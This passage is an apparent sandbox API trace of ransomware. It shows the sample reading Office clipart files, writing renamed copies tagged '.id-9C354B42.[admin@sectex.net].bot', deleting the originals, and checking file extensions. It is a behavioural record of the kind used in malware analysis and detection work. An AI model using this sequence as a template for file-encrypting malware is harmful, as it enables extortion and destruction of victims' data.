	[0143.282] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1212) returned 1
	[0143.282] CloseHandle (hObject=0x2a0) returned 1
	[0143.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 0x20
	[0143.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.286] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.286] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.287] GetLastError () returned 0x0
	[0143.287] ReadFile (in: hFile=0x2a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4bc, lpOverlapped=0x0) returned 1
	[0143.288] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4c0, lpOverlapped=0x0) returned 1
	[0143.289] ReadFile (in: hFile=0x2a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.289] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.289] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.289] CloseHandle (hObject=0x3b4) returned 1
	[0143.289] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.289] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.291] CloseHandle (hObject=0x2a0) returned 1
	[0143.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 1
	[0143.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.292] lstrlenW (lpString=".doc") returned 4
	[0143.292] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.292] lstrlenW (lpString=".docx") returned 5
	[0143.292] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.292] lstrlenW (lpString=".pdf") returned 4
	[0143.292] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.292] lstrlenW (lpString=".xls") returned 4
	[0143.292] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.292] lstrlenW (lpString=".xlsx") returned 5
	[0143.292] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.292] lstrlenW (lpString=".ppt") returned 4
	[0143.292] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.293] lstrlenW (lpString=".zip") returned 4
	[0143.293] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.293] lstrlenW (lpString=".rar") returned 4
	[0143.293] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString=".bz2") returned 4
	[0143.293] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString=".7z") returned 3
	[0143.293] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.293] lstrlenW (lpString=".dbf") returned 4
	[0143.293] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.293] lstrlenW (lpString=".1cd") returned 4
	[0143.293] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.293] lstrlenW (lpString=".jpg") returned 4
	[0143.293] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.293] lstrlenW (lpString=".doc") returned 4
	[0143.293] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.293] lstrlenW (lpString=".docx") returned 5
	[0143.293] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.293] lstrlenW (lpString=".pdf") returned 4
	[0143.293] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.294] lstrlenW (lpString=".xls") returned 4
	[0143.294] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.294] lstrlenW (lpString=".xlsx") returned 5
	[0143.294] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.294] lstrlenW (lpString=".ppt") returned 4
	[0143.294] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.294] lstrlenW (lpString=".zip") returned 4
	[0143.294] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.294] lstrlenW (lpString=".rar") returned 4
	[0143.294] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.294] lstrlenW (lpString=".bz2") returned 4
	[0143.294] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.294] lstrlenW (lpString=".7z") returned 3
	[0143.294] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.294] lstrlenW (lpString=".dbf") returned 4
	[0143.294] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.294] lstrlenW (lpString=".1cd") returned 4
	[0143.294] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63
	[0143.294] lstrlenW (lpString=".jpg") returned 4
	[0143.294] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.294] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.294] lstrlenW (lpString="BS00441_.WMF") returned 12
	[0143.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.295] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3524) returned 1
	[0143.295] CloseHandle (hObject=0x2a0) returned 1
	[0143.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 0x20
	[0143.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.295] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.295] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.297] GetLastError () returned 0x0
	[0143.297] ReadFile (in: hFile=0x2a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xdc4, lpOverlapped=0x0) returned 1
	[0143.299] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xdd0, lpOverlapped=0x0) returned 1
	[0143.300] ReadFile (in: hFile=0x2a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.300] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.300] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.300] CloseHandle (hObject=0x3b4) returned 1
	[0143.300] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.300] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.302] CloseHandle (hObject=0x2a0) returned 1
	[0143.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.303] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 1
	[0143.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.303] lstrlenW (lpString=".doc") returned 4
	[0143.303] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.303] lstrlenW (lpString=".docx") returned 5
	[0143.303] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.303] lstrlenW (lpString=".pdf") returned 4
	[0143.303] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.303] lstrlenW (lpString=".xls") returned 4
	[0143.303] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.303] lstrlenW (lpString=".xlsx") returned 5
	[0143.303] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.303] lstrlenW (lpString=".ppt") returned 4
	[0143.303] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.303] lstrlenW (lpString=".zip") returned 4
	[0143.303] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.303] lstrlenW (lpString=".rar") returned 4
	[0143.303] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString=".bz2") returned 4
	[0143.304] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString=".7z") returned 3
	[0143.304] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.304] lstrlenW (lpString=".dbf") returned 4
	[0143.304] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.304] lstrlenW (lpString=".1cd") returned 4
	[0143.304] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.304] lstrlenW (lpString=".jpg") returned 4
	[0143.304] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.304] lstrlenW (lpString=".doc") returned 4
	[0143.304] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString=".docx") returned 5
	[0143.304] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.304] lstrlenW (lpString=".pdf") returned 4
	[0143.304] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString=".xls") returned 4
	[0143.304] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.304] lstrlenW (lpString=".xlsx") returned 5
	[0143.304] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.304] lstrlenW (lpString=".ppt") returned 4
	[0143.304] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.304] lstrlenW (lpString=".zip") returned 4
	[0143.304] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.304] lstrlenW (lpString=".rar") returned 4
	[0143.304] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.304] lstrlenW (lpString=".bz2") returned 4
	[0143.305] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.305] lstrlenW (lpString=".7z") returned 3
	[0143.305] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.305] lstrlenW (lpString=".dbf") returned 4
	[0143.305] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.305] lstrlenW (lpString=".1cd") returned 4
	[0143.305] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63
	[0143.305] lstrlenW (lpString=".jpg") returned 4
	[0143.305] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.305] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.305] lstrlenW (lpString="BS00442_.WMF") returned 12
	[0143.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.305] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2488) returned 1
	[0143.306] CloseHandle (hObject=0x2a0) returned 1
	[0143.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 0x20
	[0143.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.306] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.306] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.306] GetLastError () returned 0x0
	[0143.307] ReadFile (in: hFile=0x2a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9b8, lpOverlapped=0x0) returned 1
	[0143.371] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9c0, lpOverlapped=0x0) returned 1
	[0143.372] ReadFile (in: hFile=0x2a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.372] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.372] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.443] CloseHandle (hObject=0x3b4) returned 1
	[0143.443] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.443] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.445] CloseHandle (hObject=0x2a0) returned 1
	[0143.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 1
	[0143.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.485] lstrlenW (lpString=".doc") returned 4
	[0143.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.485] lstrlenW (lpString=".docx") returned 5
	[0143.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.485] lstrlenW (lpString=".pdf") returned 4
	[0143.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.485] lstrlenW (lpString=".xls") returned 4
	[0143.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.485] lstrlenW (lpString=".xlsx") returned 5
	[0143.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.485] lstrlenW (lpString=".ppt") returned 4
	[0143.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.485] lstrlenW (lpString=".zip") returned 4
	[0143.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.486] lstrlenW (lpString=".rar") returned 4
	[0143.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString=".bz2") returned 4
	[0143.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString=".7z") returned 3
	[0143.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.486] lstrlenW (lpString=".dbf") returned 4
	[0143.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.486] lstrlenW (lpString=".1cd") returned 4
	[0143.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.486] lstrlenW (lpString=".jpg") returned 4
	[0143.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.486] lstrlenW (lpString=".doc") returned 4
	[0143.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString=".docx") returned 5
	[0143.486] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.486] lstrlenW (lpString=".pdf") returned 4
	[0143.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString=".xls") returned 4
	[0143.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.486] lstrlenW (lpString=".xlsx") returned 5
	[0143.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.486] lstrlenW (lpString=".ppt") returned 4
	[0143.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.486] lstrlenW (lpString=".zip") returned 4
	[0143.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.486] lstrlenW (lpString=".rar") returned 4
	[0143.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.487] lstrlenW (lpString=".bz2") returned 4
	[0143.487] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.487] lstrlenW (lpString=".7z") returned 3
	[0143.487] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.487] lstrlenW (lpString=".dbf") returned 4
	[0143.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.487] lstrlenW (lpString=".1cd") returned 4
	[0143.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63
	[0143.487] lstrlenW (lpString=".jpg") returned 4
	[0143.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.487] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.487] lstrlenW (lpString="BS01080_.WMF") returned 12
	[0143.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.488] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2732) returned 1
	[0143.488] CloseHandle (hObject=0x3c4) returned 1
